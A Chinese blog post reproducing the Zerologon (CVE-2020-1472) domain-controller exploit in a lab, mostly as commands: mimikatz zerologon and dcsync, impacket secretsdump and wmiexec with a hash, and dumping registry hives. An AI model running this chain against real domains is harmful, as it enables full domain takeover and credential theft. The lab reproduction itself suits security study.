CVE-2020-1472域内提权漏洞复现

最新推荐文章于 2022-05-24 18:19:35 发布
最新推荐文章于 2022-05-24 18:19:35 发布
阅读量692 收藏 1
点赞数
分类专栏: 漏洞复现 内网蠕动 权限维持
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43645782/article/details/118573357
版权

CVE-2020-1472域内提权漏洞复现

环境

ad 192.168.164.129
user 192.168.164.133
kali 192.168.164.x

漏洞复现

mimikatz

查看原本hash

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

在这里插入图片描述

poc

mimikatz "lsadump::zerologon /target:WIN-ORHR1E13JIO.test.com /account:WIN-ORHR1E13JIO$" "exit"

在这里插入图片描述

重置密码

mimikatz "lsadump::zerologon /target:WIN-ORHR1E13JIO.test.com /account:WIN-ORHR1E13JIO$ /exploit" "exit"

在这里插入图片描述

获取密码

mimikatz "privilege::debug" "lsadump::dcsync /domain:test.com /dc:WIN-ORHR1E13JIO.test.com /user:administrator /authuser:WIN-ORHR1E13JIO$ /authdomain:test /authpassword:\"\" /authntlm" "exit"

在这里插入图片描述

恢复密码

mimikatz "lsadump::postzerologon /target:WIN-ORHR1E13JIO.test.com /account:WIN-ORHR1E13JIO$" "exit"

在这里插入图片描述

查看恢复的密码

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

在这里插入图片描述
发现已经被改变

python

https://github.com/risksense/zerologon

重置密码

python3 set_empty_pw.py WIN-ORHR1E13JIO 192.168.164.129
#python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR

在这里插入图片描述

获取域管密码1

python3 secretsdump.py test.com/WIN-ORHR1E13JIO\$@192.168.164.129 -no-pass

在这里插入图片描述

获取域控机器密码1

python3 wmiexec.py WIN-ORHR1E13JIO.test.com/administrator@192.168.164.129 -hashes :6edd712f4ec1b214af64c0cb8d0dcdf1

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
lget system.save
lget sam.save
lget security.save
del /f system.save
del /f sam.save
del /f security.save
exit

get命令失败 ,原因未知

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

获取域控机器密码2

python3 secretsdump.py WIN-ORHR1E13JIO.test.com/administrator@192.168.164.129 -hashes :6edd712f4ec1b214af64c0cb8d0dcdf1

在这里插入图片描述

恢复域控密码

python3 reinstall_original_pw.py WIN-ORHR1E13JIO 192.168.164.129 0403517db4001c19d8aa6076a40dfbb3d8d0f54da10980b778f0847b89ae....

在这里插入图片描述

查看恢复的密码

python3 secretsdump.py WIN-ORHR1E13JIO.test.com/administrator@192.168.164.129 -hashes :6edd712f4ec1b214af64c0cb8d0dcdf1

在这里插入图片描述

参考文章

https://www.jianshu.com/p/525be0335404
https://mp.weixin.qq.com/s/BZ_-ud67FpUgkP48GCtBUA

whojoe
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2020-1472 Netlogon特漏洞分析及
include_voidmain的博客
03-03 7099
0x01漏洞背景 NetLogon远程协议是一种在Windows 控上使用的RPC 接口,被用于各种与用户和机器认证相关的任务。最常用于让用户使用NTLM协议登录服务器,也用于NTP响应认证以及更新计算机密码。 微软MSRC于8月11日发布了Netlogon 特漏洞安全通告。此漏洞CVE编号CVE-2020-1472,CVSS评分:10.0。由Secura公司的Tom Tervoort发交并命名为ZeroLogon。 0x02漏洞分析 Netlogon协议使用的是自定义的加密协议来让客户端(加
CVE-2020-2883漏洞
锋刃科技的博客
09-12 1874
影响版本 Oracle WebLogic Server 10.3.6.0.0 Oracle WebLogic Server 12.1.3.0.0 Oracle WebLogic Server 12.2.1.3.0 Oracle WebLogic Server 12.2.1.4.0 环境搭建 我这里使用得是12.1.3.0.0 选择第三个选项,其他默认 Your-IP:7001/console打开网站即可 Poc地址:https://github.com/zhzyker/exphu
Cisco RV340命令执行漏洞CVE-2022-20707)及关联历史漏洞分析
C20220511的博客
05-18 1904
本篇文章主要是对Cisco RV340命令执行漏洞(CVE-2022-20707)进行的研究分析,尽管利用此漏洞需要身份验证,但可以通过CVE-2022-20705绕过有的身份验证机制实无条件的命令执行。历史相关的漏洞还包括:CVE-2020-3451、CVE-2021-1473、CVE-2021-1472,我们会逐一进行分析。
(环境搭建+CVE-2020-1472 NetLogon 漏洞
daxi0ng的博客
01-25 3893
0x00 简介 Netlogon组件是Windows上一项重要的功能组件,用于用户和机器在内网络上的认证,以及制数据库以进行控备份,还用于维护成员与之间、控之间、DC与跨DC之间的关系。 Netlogon远程协议是一个可用的在Windows控制器上的RPC(remote procedure call protocol,远程过程调用协议,允许像调用本地服务一样调用远程服务)接口,用于对中的用户和其他服务进行身份验证,最常见的是方便用户使用NTLM(N...
Cisco Small Business RV 路由器多个高危漏洞通告
爱国小白帽
04-09 728
报告编号:B6-2021-040801 报告来源:360CERT 报告作者:360CERT 更新日期:2021-04-08 0x01 漏洞简述 2021年04月08日,360CERT监测发Cisco发布了Cisco Small Business RV Series Routers多个漏洞的风险通告,漏洞编号为CVE-2021-1472,CVE-2021-1473,漏洞等级:高危,漏洞评分:8.5。 对此,360CERT建议广大用户及时将Cisco Rv VPN 路由器升级到最新版本。与此同时,请做好资.
内大杀器CVE-2020-1472
茶寂的博客
12-25 5519
前一段时间打ctf第一次接触渗透,其中CVE-2020-1472被称为控的大杀器,在本地搭建了个环境一下 CVE-2020-1472影响的版本: Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Server 2012 Windows Ser
CVE-2020-13699漏洞
锋刃科技的博客
09-18 816
简介 TeamViewer远程连接控制软件是一款随时随地连接到远程桌面电脑、移动设备及Iot,让远程连接过程更加的快速和安全,轻松实对文件、网络及程序的实时支持或访问 影响版本 TeamViewer < 8.0.258861 TeamViewer < 9.0.28860 TeamViewer < 10.0.258873 TeamViewer < 11.0.258870 TeamViewer < 12.0.258869 TeamViewer < 13.2.3.
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
CVE-2020-1472:CVE-2020-1472的测试工具
03-16
ZeroLogon测试脚本 使用Impacket库测试Zerologon漏洞CVE-2020-1472)的漏洞的Python脚本。 它尝试执行Netlogon身份验证绕过。 成功执行旁路时,脚本将立即终止,并且不执行任何Netlogon操作。 修补控制器后,检测脚本将在发送2000对RPC调用后放弃,并得出结论目标不是易受攻击的对象(错误的可能性为0.04%)。 安装 需要Python 3.7或更高版本以及Pip。 安装依赖项,如下所示: pip install -r requirements.txt 请注意,只要脚本不会被以后的Impacket版本破坏,运行pip install impacket应能正常工作。 运行脚本 脚本目标可用于目标DC或备用DC。 它也可能针对只读DC工作,但是尚未经过测试。 给定一个名为IP地址为1.2.3.4名为EXAMPLE-DC的控制器,请如下
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2020-0787本地
02-22
使用方法: 1.资源放到桌面 2.打开cmd 3.输入Exp.exe "cmd whoami > \\\\.\\pipe\\showme " show
Active Directory 服务漏洞(CVE-2022-26923)
做自己喜欢的事,并将其发挥到极致!
05-17 2739
文章目录声明一、漏洞描述二、影响范围三、Windows Active Directory (AD)四、Active Directory 证书服务五、环境配置六、漏洞七、修方案八、参考链接 声明 本文章仅用于技术学习、安全研究。切勿用于非授下渗透攻击行为,切记! 一、漏洞描述 Active Directory 漏洞 (CVE-2022-26923)允许低限用户在安装了 Active Directory 证书服务 (AD CS) 服务器角色的默认 Active Directory 环境中
CVE-2022-26923漏洞
m0_46377671的博客
05-24 3115
CVE-2022-26923漏洞 参考链接: http://www.ctfiot.com/40081.html https://tryhackme.com/room/cve202226923 https://www.bilibili.com/video/BV1hL4y1F79y?spm_id_from=333.337.search-card.all.click 1.漏洞背景 Windows Active Directory (AD) 不仅用于身份和访问管理,还供大量服务来帮助您运行和管理您的组织,其
CVE-2020-1472漏洞
blue_fantasy的博客
01-14 2231
Text. 简介 2020年8月11号,微软修了Netlogon 特漏洞,2020年9月11日,安全研究员Secura发布了公告,阐明了漏洞细节,之后相关的EXP也就被构造出来。该漏洞也称为“Zerologon”,CVSS评分为10.0,号称3秒撸控,危害严重。攻击者在通过NetLogon(MS-NRPC)协议与AD控建立安全通道时,可利用该漏洞将AD控的计算机账号密码置为空,从而控制控服务器。 原理 详细原理参看:ZeroLogon的利用以及分析 - 安全客,安全资讯平台 本文对
CVE-2020-1472()
p01son的博客
08-02 662
CVE-2020-1472() Created: July 7, 2021 5:25 PM 文章目录CVE-2020-1472()简介影响范围环境过程恢原机器hash参考 简介 CVE-2020-1472是一个windows控中严重的远程漏洞,是因为微软在Netlogon协议中没有正确使用加密算法而导致的漏洞。由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误的将IV设置为全零,这使得攻击者在明文(client chanllenge)、IV等要素可控的
CVE-2020-1472漏洞
xhwfa的博客
03-15 3916
一、漏洞简介 2020年8月11号,微软修了Netlogon特漏洞,2020年9月11日,安全研究员Secura发布了公告,阐明了漏洞细节,之后相关的EXP也就被构造出来。该漏洞也称为“Zerologon”,CVSS评分为10.0,号称3秒撸控,危害严重。攻击者在通过NetLogon(MS-NRPC)协议与AD控建立安全通道时,可利用该漏洞将AD控的计算机账号密码置为空,从而控制控服务器。 二、漏洞环境搭建 控:windows server 2008 R2,IP:192.168.16
Tomact_CVE-2020-1938漏洞
最新发布
08-31
Tomact_CVE-2020-1938漏洞,可以按照以下步骤进行操作: 1. 下载POC:可以使用以下命令下载POC文件: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 2. 在攻击机上...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值